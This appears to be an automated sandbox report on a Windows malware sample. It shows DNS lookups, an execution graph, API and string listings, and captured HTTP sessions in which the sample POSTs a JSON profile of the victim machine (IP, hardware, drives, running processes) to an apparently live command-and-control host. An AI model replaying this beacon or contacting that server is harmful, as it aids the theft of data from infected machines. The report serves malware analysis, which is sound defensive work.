Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 16:40:45.771100998 CET | 1.1.1.1 | 192.168.2.5 | 0xcc01 | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:40:45.771100998 CET | 1.1.1.1 | 192.168.2.5 | 0xcc01 | No error (0) | httpbin.org | | 98.85.100.80 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:40:48.917088032 CET | 1.1.1.1 | 192.168.2.5 | 0x4b4b | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:41:22.709176064 CET | 1.1.1.1 | 192.168.2.5 | 0x2278 | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:41:25.222946882 CET | 1.1.1.1 | 192.168.2.5 | 0x2eeb | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
                                                              • httpbin.org
                                                              • home.twentytk20pn.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49720 | 147.45.113.159 | 80 | 3668 | C:\Users\user\Desktop\f9bcOz8SxR.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 16:40:49.040304899 CET | 12360 | OUT | POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                              Host: home.twentytk20pn.top
                                                              Accept: */*
                                                              Content-Type: application/json
                                                              Content-Length: 565156
                                                              Data Ascii: { "ip": "8.46.123.189", "current_time": "1734709247", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49803 | 147.45.113.159 | 80 | 3668 | C:\Users\user\Desktop\f9bcOz8SxR.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 16:41:23.112723112 CET | 12360 | OUT | POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                              Host: home.twentytk20pn.top
                                                              Accept: */*
                                                              Content-Type: application/json
                                                              Content-Length: 565156
                                                              Data Ascii: { "ip": "8.46.123.189", "current_time": "1734709247", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 20, 2024 16:41:24.491043091 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49809 | 147.45.113.159 | 80 | 3668 | C:\Users\user\Desktop\f9bcOz8SxR.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 16:41:25.344901085 CET | 287 | OUT | POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                              Host: home.twentytk20pn.top
                                                              Accept: */*
                                                              Content-Type: application/json
                                                              Content-Length: 143
                                                              Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                              Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Dec 20, 2024 16:41:26.724858999 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49714 | 34.226.108.155 | 443 | 3668 | C:\Users\user\Desktop\f9bcOz8SxR.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:40:47 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                              Host: httpbin.org
                                                              Accept: */*
2024-12-20 15:40:47 UTC | 224 | IN | HTTP/1.1 200 OK
                                                              Date: Fri, 20 Dec 2024 15:40:47 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 31
                                                              Connection: close
                                                              Server: gunicorn/19.9.0
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Credentials: true
2024-12-20 15:40:47 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                              Data Ascii: { "origin": "8.46.123.189"}



Target ID: 0
Start time: 10:40:43
Start date: 20/12/2024
Path: C:\Users\user\Desktop\f9bcOz8SxR.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\f9bcOz8SxR.exe"
Imagebase: 0x880000
File size: 4'436'480 bytes
MD5 hash: 1D057672840921889505863B33E87671
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


                                                                Execution Graph

Execution Coverage: 3.5%
Dynamic/Decrypted Code Coverage: 48.5%
Signature Coverage: 9.3%
Total number of Nodes: 557
Total number of Limit Nodes: 58
GetLogicalDrives 88240->88241 88242 6fb0cbe 88241->88242 88243 6fb0cf9 88242->88243 88244 6fb0cd3 GetLogicalDrives 88242->88244 88244->88243 88246 6fb0b59 88245->88246 88247 6fb0c05 2 API calls 88246->88247 88248 6fb0bf6 88247->88248 88249 6fb0cd2 GetLogicalDrives 88248->88249 88250 6fb0cbe 88249->88250 88251 6fb0cf9 88250->88251 88252 6fb0cd3 GetLogicalDrives 88250->88252 88252->88251 88255 6fb0861 88253->88255 88254 6fb0926 88255->88254 88256 6fb0c05 2 API calls 88255->88256 88257 6fb0bf6 88256->88257 88258 6fb0cd2 GetLogicalDrives 88257->88258 88259 6fb0cbe 88258->88259 88260 6fb0cf9 88259->88260 88261 6fb0cd3 GetLogicalDrives 88259->88261 88261->88260 88264 6fb0892 88262->88264 88263 6fb0926 88264->88263 88265 6fb0c05 2 API calls 88264->88265 88266 6fb0bf6 88265->88266 88267 6fb0cd2 GetLogicalDrives 88266->88267 88268 6fb0cbe 88267->88268 88269 6fb0cf9 88268->88269 88270 6fb0cd3 GetLogicalDrives 88268->88270 88270->88269 88272 6fb0a36 88271->88272 88273 6fb0c05 2 API calls 88272->88273 88274 6fb0bf6 88273->88274 88275 6fb0cd2 GetLogicalDrives 88274->88275 88276 6fb0cbe 88275->88276 88277 6fb0cf9 88276->88277 88278 6fb0cd3 GetLogicalDrives 88276->88278 88278->88277 88280 6fb0b98 88279->88280 88281 6fb0c05 2 API calls 88280->88281 88282 6fb0bf6 88281->88282 88283 6fb0cd2 GetLogicalDrives 88282->88283 88284 6fb0cbe 88283->88284 88285 6fb0cf9 88284->88285 88286 6fb0cd3 GetLogicalDrives 88284->88286 88286->88285 88288 6fb0b3c 88287->88288 88289 6fb0c05 2 API calls 88288->88289 88290 6fb0bf6 88289->88290 88291 6fb0cd2 GetLogicalDrives 88290->88291 88292 6fb0cbe 88291->88292 88293 6fb0cf9 88292->88293 88294 6fb0cd3 GetLogicalDrives 88292->88294 88294->88293 88296 6fb0824 88295->88296 88298 6fb0861 88295->88298 88297 6fb0926 88298->88297 88299 6fb0c05 2 API calls 88298->88299 88300 6fb0bf6 88299->88300 88301 6fb0cd2 GetLogicalDrives 88300->88301 88302 6fb0cbe 88301->88302 88303 6fb0cf9 88302->88303 88304 6fb0cd3 GetLogicalDrives 88302->88304 88304->88303 88306 6fb0cf9 
88305->88306 88308 6fb0a76 88307->88308 88309 6fb0c05 2 API calls 88308->88309 88310 6fb0bf6 88309->88310 88311 6fb0cd2 GetLogicalDrives 88310->88311 88312 6fb0cbe 88311->88312 88313 6fb0cf9 88312->88313 88314 6fb0cd3 GetLogicalDrives 88312->88314 88314->88313 88316 6fb0c1d 88315->88316 88317 6fb0cd2 GetLogicalDrives 88316->88317 88318 6fb0cbe 88317->88318 88319 6fb0cf9 88318->88319 88320 6fb0cd3 GetLogicalDrives 88318->88320 88320->88319 88322 6fb0b85 88321->88322 88323 6fb0c05 2 API calls 88322->88323 88324 6fb0bf6 88323->88324 88325 6fb0cd2 GetLogicalDrives 88324->88325 88326 6fb0cbe 88325->88326 88327 6fb0cf9 88326->88327 88328 6fb0cd3 GetLogicalDrives 88326->88328 88328->88327 88330 6fb0a41 88329->88330 88331 6fb0c05 2 API calls 88330->88331 88332 6fb0bf6 88331->88332 88333 6fb0cd2 GetLogicalDrives 88332->88333 88334 6fb0cbe 88333->88334 88335 6fb0cf9 88334->88335 88336 6fb0cd3 GetLogicalDrives 88334->88336 88336->88335 88338 6fb0bad 88337->88338 88339 6fb0c05 2 API calls 88338->88339 88340 6fb0bf6 88339->88340 88341 6fb0cd2 GetLogicalDrives 88340->88341 88342 6fb0cbe 88341->88342 88343 6fb0cf9 88342->88343 88344 6fb0cd3 GetLogicalDrives 88342->88344 88344->88343 88346 6fb0cbe 88345->88346 88347 6fb0cd2 GetLogicalDrives 88345->88347 88348 6fb0cf9 88346->88348 88349 6fb0cd3 GetLogicalDrives 88346->88349 88347->88346 88349->88348 88351 6fb0af2 88350->88351 88352 6fb0c05 2 API calls 88351->88352 88353 6fb0bf6 88352->88353 88354 6fb0cd2 GetLogicalDrives 88353->88354 88355 6fb0cbe 88354->88355 88356 6fb0cf9 88355->88356 88357 6fb0cd3 GetLogicalDrives 88355->88357 88357->88356 88359 6fb0c86 88358->88359 88360 6fb0cd2 GetLogicalDrives 88359->88360 88361 6fb0cbe 88360->88361 88362 6fb0cf9 88361->88362 88363 6fb0cd3 GetLogicalDrives 88361->88363 88363->88362 88365 6fb0a33 88364->88365 88366 6fb0c05 2 API calls 88365->88366 88367 6fb0bf6 88366->88367 88368 6fb0cd2 GetLogicalDrives 88367->88368 88369 6fb0cbe 88368->88369 88370 6fb0cf9 88369->88370 88371 6fb0cd3 
GetLogicalDrives 88369->88371 88371->88370 88373 6fb0b35 88372->88373 88374 6fb0c05 2 API calls 88373->88374 88375 6fb0bf6 88374->88375 88376 6fb0cd2 GetLogicalDrives 88375->88376 88377 6fb0cbe 88376->88377 88378 6fb0cf9 88377->88378 88379 6fb0cd3 GetLogicalDrives 88377->88379 88379->88378 88381 6fb0be1 88380->88381 88382 6fb0c05 2 API calls 88381->88382 88383 6fb0bf6 88382->88383 88384 6fb0cd2 GetLogicalDrives 88383->88384 88385 6fb0cbe 88384->88385 88386 6fb0cd3 GetLogicalDrives 88385->88386 88387 6fb0cf9 88385->88387 88386->88387 88389 6fb0a76 88388->88389 88390 6fb0c05 2 API calls 88389->88390 88391 6fb0bf6 88390->88391 88392 6fb0cd2 GetLogicalDrives 88391->88392 88393 6fb0cbe 88392->88393 88394 6fb0cf9 88393->88394 88395 6fb0cd3 GetLogicalDrives 88393->88395 88395->88394 88397 6fb0b3c 88396->88397 88398 6fb0c05 2 API calls 88397->88398 88399 6fb0bf6 88398->88399 88400 6fb0cd2 GetLogicalDrives 88399->88400 88401 6fb0cbe 88400->88401 88402 6fb0cf9 88401->88402 88403 6fb0cd3 GetLogicalDrives 88401->88403 88403->88402 88405 6fb0c8e 88404->88405 88407 6fb0cf5 88404->88407 88406 6fb0cd2 GetLogicalDrives 88405->88406 88408 6fb0cbe 88406->88408 88408->88407 88409 6fb0cd3 GetLogicalDrives 88408->88409 88409->88407 88411 6fb0a82 88410->88411 88412 6fb0c05 2 API calls 88411->88412 88413 6fb0bf6 88412->88413 88414 6fb0cd2 GetLogicalDrives 88413->88414 88415 6fb0cbe 88414->88415 88416 6fb0cd3 GetLogicalDrives 88415->88416 88417 6fb0cf9 88415->88417 88416->88417 88420 6fb0917 88418->88420 88419 6fb0926 88420->88419 88421 6fb0c05 2 API calls 88420->88421 88422 6fb0bf6 88421->88422 88423 6fb0cd2 GetLogicalDrives 88422->88423 88424 6fb0cbe 88423->88424 88425 6fb0cf9 88424->88425 88426 6fb0cd3 GetLogicalDrives 88424->88426 88426->88425 88428 6fb0c8e 88427->88428 88429 6fb0cd2 GetLogicalDrives 88428->88429 88430 6fb0cbe 88429->88430 88431 6fb0cf9 88430->88431 88432 6fb0cd3 GetLogicalDrives 88430->88432 88432->88431 88434 6fb0a41 88433->88434 88435 6fb0c05 2 API calls 
88434->88435 88436 6fb0bf6 88435->88436 88437 6fb0cd2 GetLogicalDrives 88436->88437 88438 6fb0cbe 88437->88438 88439 6fb0cf9 88438->88439 88440 6fb0cd3 GetLogicalDrives 88438->88440 88440->88439 88442 6fb0c3c 88441->88442 88443 6fb0cd2 GetLogicalDrives 88442->88443 88444 6fb0cbe 88443->88444 88445 6fb0cf9 88444->88445 88446 6fb0cd3 GetLogicalDrives 88444->88446 88446->88445 88448 6fb092f 88447->88448 88450 6fb08bc 88447->88450 88449 6fb0926 88450->88449 88451 6fb0c05 2 API calls 88450->88451 88452 6fb0bf6 88451->88452 88453 6fb0cd2 GetLogicalDrives 88452->88453 88454 6fb0cbe 88453->88454 88455 6fb0cf9 88454->88455 88456 6fb0cd3 GetLogicalDrives 88454->88456 88456->88455 88458 6fb0c1d 88457->88458 88459 6fb0cd2 GetLogicalDrives 88458->88459 88460 6fb0cbe 88459->88460 88461 6fb0cf9 88460->88461 88462 6fb0cd3 GetLogicalDrives 88460->88462 88462->88461 88463 883d5e 88468 883d30 88463->88468 88464 883d90 88472 88fcb0 6 API calls 88464->88472 88467 883dc1 88468->88463 88468->88464 88469 890ab0 88468->88469 88473 8905b0 88469->88473 88471 890acd 88471->88468 88472->88467 88474 8905bd 88473->88474 88477 8907c7 88473->88477 88475 890707 WSAEventSelect 88474->88475 88476 8907ef 88474->88476 88474->88477 88479 8876a0 send 88474->88479 88475->88474 88475->88477 88476->88477 88482 890847 88476->88482 88483 896fa0 88476->88483 88477->88471 88479->88474 88480 8909e8 WSAEnumNetworkEvents 88481 8909d0 WSAEventSelect 88480->88481 88480->88482 88481->88480 88481->88482 88482->88477 88482->88480 88482->88481 88484 896fd4 88483->88484 88486 896feb 88483->88486 88485 897207 select 88484->88485 88484->88486 88485->88486 88486->88482 88625 8829ff FindFirstFileA 88626 882a31 88625->88626 88627 882a5c RegOpenKeyExA 88626->88627 88628 882a93 88627->88628 88629 882ade CharUpperA 88628->88629 88630 882b0a 88629->88630 88631 882bf9 QueryFullProcessImageNameA 88630->88631 88632 882c3b CloseHandle 88631->88632 88634 882c64 88632->88634 88633 882df1 CloseHandle 88635 882e23 88633->88635 
88634->88633 88487 8b8b50 88488 8b8b6b 88487->88488 88506 8b8bb5 88487->88506 88489 8b8b8f 88488->88489 88490 8b8bf3 88488->88490 88488->88506 88526 896e40 select 88489->88526 88507 8ba550 88490->88507 88493 8b8bfc 88497 8b8c1f connect 88493->88497 88498 8b8c35 88493->88498 88504 8b8cb2 88493->88504 88493->88506 88494 8b8ba1 88495 8b8cd9 SleepEx getsockopt 88494->88495 88494->88504 88494->88506 88499 8b8d18 88495->88499 88496 8ba150 getsockname 88505 8b8dff 88496->88505 88497->88498 88522 8ba150 88498->88522 88500 8b8d43 88499->88500 88499->88504 88503 8ba150 getsockname 88500->88503 88503->88506 88504->88496 88504->88505 88504->88506 88505->88506 88527 8878b0 closesocket 88505->88527 88508 8ba575 88507->88508 88511 8ba597 88508->88511 88529 8875e0 88508->88529 88510 8878b0 closesocket 88513 8ba713 88510->88513 88512 8ba811 setsockopt 88511->88512 88518 8ba83b 88511->88518 88520 8ba69b 88511->88520 88512->88518 88513->88493 88515 8baf56 88516 8baf5d 88515->88516 88515->88520 88516->88513 88517 8ba150 getsockname 88516->88517 88517->88513 88518->88520 88521 8babe1 88518->88521 88535 8b6be0 8 API calls 88518->88535 88520->88510 88520->88513 88521->88520 88534 8e67e0 ioctlsocket 88521->88534 88523 8ba15f 88522->88523 88525 8ba1d0 88522->88525 88524 8ba181 getsockname 88523->88524 88523->88525 88524->88525 88525->88494 88526->88494 88528 8878c5 88527->88528 88528->88506 88530 8875ef 88529->88530 88531 887607 socket 88529->88531 88530->88531 88533 887643 88530->88533 88532 88762b 88531->88532 88532->88511 88533->88511 88534->88515 88535->88521 88636 8b95b0 88637 8b95c8 88636->88637 88639 8b95fd 88636->88639 88638 8ba150 getsockname 88637->88638 88637->88639 88638->88639 88640 8b6ab0 88641 8b6ad5 88640->88641 88642 8b6bb4 88641->88642 88644 896fa0 select 88641->88644 88643 935ed0 7 API calls 88642->88643 88646 8b6ba9 88643->88646 88645 8b6b54 88644->88645 88645->88642 88645->88646 88647 8b6b5d 88645->88647 88647->88646 88649 935ed0 88647->88649 88652 935a50 88649->88652 
88651 935ee5 88651->88647 88653 935a58 88652->88653 88659 935ea0 88652->88659 88654 935b50 88653->88654 88664 935b88 88653->88664 88665 935a99 88653->88665 88657 935eb4 88654->88657 88658 935b7a 88654->88658 88654->88664 88655 935e96 88685 949480 socket ioctlsocket connect getsockname closesocket 88655->88685 88686 936f10 socket ioctlsocket connect getsockname closesocket 88657->88686 88675 9370a0 88658->88675 88659->88651 88662 935ec2 88662->88662 88668 935cae 88664->88668 88683 935ef0 socket ioctlsocket connect getsockname 88664->88683 88665->88664 88669 9370a0 6 API calls 88665->88669 88682 936f10 socket ioctlsocket connect getsockname closesocket 88665->88682 88668->88655 88671 94a920 88668->88671 88684 949320 socket ioctlsocket connect getsockname closesocket 88668->88684 88669->88665 88672 94a944 88671->88672 88673 94a94b 88672->88673 88674 94a977 send 88672->88674 88673->88668 88674->88668 88679 9370ae 88675->88679 88677 9371a7 88677->88664 88678 93717f 88678->88677 88692 949320 socket ioctlsocket connect getsockname closesocket 88678->88692 88679->88677 88679->88678 88687 94a8c0 88679->88687 88691 9371c0 socket ioctlsocket connect getsockname 88679->88691 88682->88665 88683->88664 88684->88668 88685->88659 88686->88662 88688 94a8e6 88687->88688 88689 94a903 recvfrom 88687->88689 88688->88689 88690 94a8ed 88688->88690 88689->88690 88690->88679 88691->88679 88692->88677 88693 cbd270 88695 cbd29a 88693->88695 88694 cbd2a6 88695->88694 88698 c112a0 88695->88698 88697 cbd2da 88699 c112ac 88698->88699 88702 c0e030 88699->88702 88701 c112da 88701->88697 88704 c0e07d 88702->88704 88703 c0e16e 88703->88701 88704->88703 88706 c0b180 islower islower 88704->88706 88706->88704 88536 8831d7 88537 8831f4 88536->88537 88538 883200 88537->88538 88539 8832dc CloseHandle 88537->88539 88539->88538 88540 882f17 88548 882f2c 88540->88548 88541 8831d3 88542 882fb3 RegOpenKeyExA 88542->88548 88543 88315c RegEnumKeyExA 88544 8831b2 RegCloseKey 88543->88544 88543->88548 88544->88548 
88545 883046 RegOpenKeyExA 88546 883089 RegQueryValueExA 88545->88546 88545->88548 88547 88313b RegCloseKey 88546->88547 88546->88548 88547->88548 88548->88541 88548->88542 88548->88543 88548->88545 88548->88547
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                                • API String ID: 0-1590685507
                                                                • Opcode ID: f66c29674cc9b2ec9865ea6946af7593a99ce3fbb81349153a76f36b673c58c7
                                                                • Instruction ID: e9bbed21b92a2dcb8985fdd04dc575b3f1c59e7fc01022346ee72d5cd37b851f
                                                                • Opcode Fuzzy Hash: f66c29674cc9b2ec9865ea6946af7593a99ce3fbb81349153a76f36b673c58c7
                                                                • Instruction Fuzzy Hash: 22C26C31A047449FD724CF29C984BAAB7E1FF84314F09866DED989B362D771E984CB81

                                                                Control-flow Graph

                                                                [Control-flow graph 1183 for the function at 88255d; nodes are marked executed or not executed.]
                                                                APIs
                                                                • GetSystemInfo.KERNELBASE ref: 00882579
                                                                • GlobalMemoryStatusEx.KERNELBASE ref: 008825CC
                                                                • GetDriveTypeA.KERNELBASE ref: 00882647
                                                                • GetDiskFreeSpaceExA.KERNELBASE ref: 0088267E
                                                                • KiUserCallbackDispatcher.NTDLL ref: 008827E2
                                                                • SHGetKnownFolderPath.SHELL32 ref: 0088286D
                                                                • FindFirstFileW.KERNELBASE ref: 008828F8
                                                                • FindNextFileW.KERNELBASE ref: 0088291F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                                                • String ID: @$`
                                                                • API String ID: 2066228396-3318628307
                                                                • Opcode ID: ed1be7798a0c1ffbc426f2ecdc73f2b89392632ede3718c44a67905ad4f02a34
                                                                • Instruction ID: 3709f79c5a46bf4b09dabf3a902daa6755898c68a25ad5eca349eae3e96f5636
                                                                • Opcode Fuzzy Hash: ed1be7798a0c1ffbc426f2ecdc73f2b89392632ede3718c44a67905ad4f02a34
                                                                • Instruction Fuzzy Hash: 47D192B4905309AFCB10EF68C98569EBBF0FF44354F00896EE498A7350E7749A85DF52

                                                                Control-flow Graph

                                                                [Control-flow graph 1392 for the function at 8829ff; nodes are marked executed or not executed. API calls named in the graph: FindFirstFileA, RegOpenKeyExA, CharUpperA, QueryFullProcessImageNameA, CloseHandle.]
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                                • String ID: 0
                                                                • API String ID: 2406880114-4108050209
                                                                • Opcode ID: 24eca958bdd395240b4cbb6a12ee9db6c687cd8218c707bf5a02a493b9a366a8
                                                                • Instruction ID: f6474ca1cc88ecff3f7dbeaf4ecc389efa5a47466705324d9969ac56b8ea8ad1
                                                                • Opcode Fuzzy Hash: 24eca958bdd395240b4cbb6a12ee9db6c687cd8218c707bf5a02a493b9a366a8
                                                                • Instruction Fuzzy Hash: 02E1E5B49053099FCB10EF68D98569DBBF4EF44314F00886AE988EB354E774DA88DF52

                                                                Control-flow Graph

                                                                control_flow_graph (first node 8905b0-8905b7); API calls in graph: WSAEventSelect, WSAEnumNetworkEvents
                                                                APIs
                                                                • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00890712
                                                                • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 008909DC
                                                                • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 008909FC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Similarity
                                                                • API ID: EventSelect$EnumEventsNetwork
                                                                • String ID: multi.c
                                                                • API String ID: 2170980988-214371023
                                                                • Opcode ID: 34683a2c21bf1e953aafb56cf3a05fbf1a50e0f0968b24312aeb75ee5493fe47
                                                                • Instruction ID: 0079906a7c029c7a6776b7b0771f78415c8253fb1e2929a25d89edad01a33c9a
                                                                • Opcode Fuzzy Hash: 34683a2c21bf1e953aafb56cf3a05fbf1a50e0f0968b24312aeb75ee5493fe47
                                                                • Instruction Fuzzy Hash: 7ED1BC71608305AFEB10EF64C881B6B77E4FB94318F08482CF895D2252E775E954CF92

                                                                Control-flow Graph

                                                                control_flow_graph (first node 94b180-94b195); API calls in graph: getsockname
                                                                APIs
                                                                • getsockname.WS2_32(-00000020,-00000020,?), ref: 0094B2B6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Similarity
                                                                • API ID: getsockname
                                                                • String ID: ares__sortaddrinfo.c$cur != NULL
                                                                • API String ID: 3358416759-2430778319
                                                                • Opcode ID: 0a59c58ba0fd2a14d9859fe5daab2a36d0cc07e5e67531c1dc0d3ab769eddc38
